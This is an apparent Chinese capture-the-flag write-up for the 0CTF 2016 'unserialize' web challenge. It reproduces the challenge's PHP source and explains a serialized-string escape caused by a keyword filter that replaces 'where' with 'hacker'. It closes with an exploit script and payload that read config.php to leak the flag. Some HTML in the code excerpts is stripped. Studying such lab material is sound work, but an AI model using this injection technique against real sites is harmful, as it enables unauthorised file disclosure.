0ctf_2016 _Web_unserialize

	require_once('class.php');
	if($_SESSION['username']) {
		header('Location: profile.php');
		exit;
	}
	if($_POST['username'] && $_POST['password']) {
		$username = $_POST['username'];
		$password = $_POST['password'];
 
		if(strlen($username) < 3 or strlen($username) > 16) 
			die('Invalid user name');
 
		if(strlen($password) < 3 or strlen($password) > 16) 
			die('Invalid password');
 
		if($user->login($username, $password)) {
			$_SESSION['username'] = $username;
			header('Location: profile.php');
			exit;	
		}
		else {
			die('Invalid user name or password');
		}
	}
	else {

	require_once('class.php');
	if($_POST['username'] && $_POST['password']) {
		$username = $_POST['username'];
		$password = $_POST['password'];
 
		if(strlen($username) < 3 or strlen($username) > 16) 
			die('Invalid user name');
 
		if(strlen($password) < 3 or strlen($password) > 16) 
			die('Invalid password');
		if(!$user->is_exists($username)) {
			$user->register($username, $password);
			echo 'Register OK!Please Login';		
		}
		else {
			die('User name Already Exists');
		}
	}
	else {
?>

	require_once('class.php');
	if($_SESSION['username'] == null) {
		die('Login First');	
	}
	if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {
 
		$username = $_SESSION['username'];
		if(!preg_match('/^\d{11}$/', $_POST['phone']))
			die('Invalid phone');
 
		if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
			die('Invalid email');
		
		if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
			die('Invalid nickname');
 
		$file = $_FILES['photo'];
		if($file['size'] < 5 or $file['size'] > 1000000)
			die('Photo size error');
 
		move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
		$profile['phone'] = $_POST['phone'];
		$profile['email'] = $_POST['email'];
		$profile['nickname'] = $_POST['nickname'];
		$profile['photo'] = 'upload/' . md5($file['name']);
 
		$user->update_profile($username, serialize($profile));
		echo 'Update Profile Success!Your Profile';
	}
	else {
?>

	require_once('class.php');
	if($_SESSION['username'] == null) {
		die('Login First');	
	}
	$username = $_SESSION['username'];
	$profile=$user->show_profile($username);
	if($profile  == null) {
		header('Location: update.php');
	}
	else {
		$profile = unserialize($profile);
		$phone = $profile['phone'];
		$email = $profile['email'];
		$nickname = $profile['nickname'];
		$photo = base64_encode(file_get_contents($profile['photo']));
?>
<head>
   
   <link href="static/bootstrap.min.css" rel="stylesheet">
   
   
	
"container" style="margin-top:100px">  
		"data:image/gif;base64,$photo; ?>" class="img-memeda " style="width:180px;margin:0px auto;">
		
Hi echo $nickname;?>
		Phone: echo $phone;?>
		Email: echo $email;?>
	

看到前面的代码。 满足了登录，且profile信息存在，则后面有个else 。 可能这就是最终利用到的代码：

$photo = base64_encode(file_get_contents($profile['photo']));

可能也就是说，我们要修改 profile 中的 photo 来读取flag。

知道了这些，我们再看看剩下的两个代码：

class.php

require('config.php');
 
class user extends mysql{
	private $table = 'users';
 
	public function is_exists($username) {
		$username = parent::filter($username);
 
		$where = "username = '$username'";
		return parent::select($this->table, $where);
	}
	public function register($username, $password) {
		$username = parent::filter($username);
		$password = parent::filter($password);
 
		$key_list = Array('username', 'password');
		$value_list = Array($username, md5($password));
		return parent::insert($this->table, $key_list, $value_list);
	}
	public function login($username, $password) {
		$username = parent::filter($username);
		$password = parent::filter($password);
 
		$where = "username = '$username'";
		$object = parent::select($this->table, $where);
		if ($object && $object->password === md5($password)) {
			return true;
		} else {
			return false;
		}
	}
	public function show_profile($username) {
		$username = parent::filter($username);
 
		$where = "username = '$username'";
		$object = parent::select($this->table, $where);
		return $object->profile;
	}
	public function update_profile($username, $new_profile) {
		$username = parent::filter($username);
		$new_profile = parent::filter($new_profile);
 
		$where = "username = '$username'";
		return parent::update($this->table, 'profile', $new_profile, $where);
	}
	public function __tostring() {
		return __class__;
	}
}
 
class mysql {
	private $link = null;
 
	public function connect($config) {
		$this->link = mysql_connect(
			$config['hostname'],
			$config['username'], 
			$config['password']
		);
		mysql_select_db($config['database']);
		mysql_query("SET sql_mode='strict_all_tables'");
 
		return $this->link;
	}
 
	public function select($table, $where, $ret = '*') {
		$sql = "SELECT $ret FROM $table WHERE $where";
		$result = mysql_query($sql, $this->link);
		return mysql_fetch_object($result);
	}
 
	public function insert($table, $key_list, $value_list) {
		$key = implode(',', $key_list);
		$value = '\'' . implode('\',\'', $value_list) . '\''; 
		$sql = "INSERT INTO $table ($key) VALUES ($value)";
		return mysql_query($sql);
	}
 
	public function update($table, $key, $value, $where) {
		$sql = "UPDATE $table SET $key = '$value' WHERE $where";
		return mysql_query($sql);
	}
 
	public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);
 
		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}
	public function __tostring() {
		return __class__;
	}
}
session_start();
$user = new user();
$user->connect($config);

class一般都是重要函数函数调用和数据库查询需要用到的文件。 class中包含了 config。php 去看看config .php 

config.php:

	$config['hostname'] = '127.0.0.1';
	$config['username'] = 'root';
	$config['password'] = '';
	$config['database'] = '';
	$flag = '';
?>
 

看到这里有个flag  应该是要class调用 config.php进行读取了。

经过前面的思路就是 ，注册，登录，然后update 更新自己的信息，传给了 profile 。而photo参数具有文件读取的功能。

update.php中。

		move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
		$profile['phone'] = $_POST['phone'];
		$profile['email'] = $_POST['email'];
		$profile['nickname'] = $_POST['nickname'];
		$profile['photo'] = 'upload/' . md5($file['name']);
 
		$user->update_profile($username, serialize($profile));
		echo 'Update Profile Success!Your Profile';
	}
	else {

这里调用了 个 update_profile 跟进一下。

	public function update_profile($username, $new_profile) {
		$username = parent::filter($username);
		$new_profile = parent::filter($new_profile);
 
		$where = "username = '$username'";
		return parent::update($this->table, 'profile', $new_profile, $where);
	}

直接修改对象中的profile 信息，这里还调用了filter 过滤，跟进一下 filter 函数。

	public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);
 
		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}

return preg_replace($safe, 'hacker', $string);

如果我们输入 'select', 'insert', 'update', 'delete', 'where' 这些字符，他就会自动替换为 hacker。

不由想到 字符串逃串。

 果然把 我们的photo 替换成了hacker

exp

 
class b
{
	public $phone = "12345678901";
	public $email = "123@qq.com";
	public $nickname = array("wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere");
	public $photo = "config.php";
}
$a=new b();
$profile = serialize($a);
echo $profile;
 
?>
//O:1:"b":4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:10:"123@qq.com";s:8:"nickname";a:1:{i:0;s:170:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}

抓包

返回页面后点击Your Profile

查看源代码：

 解密就是flag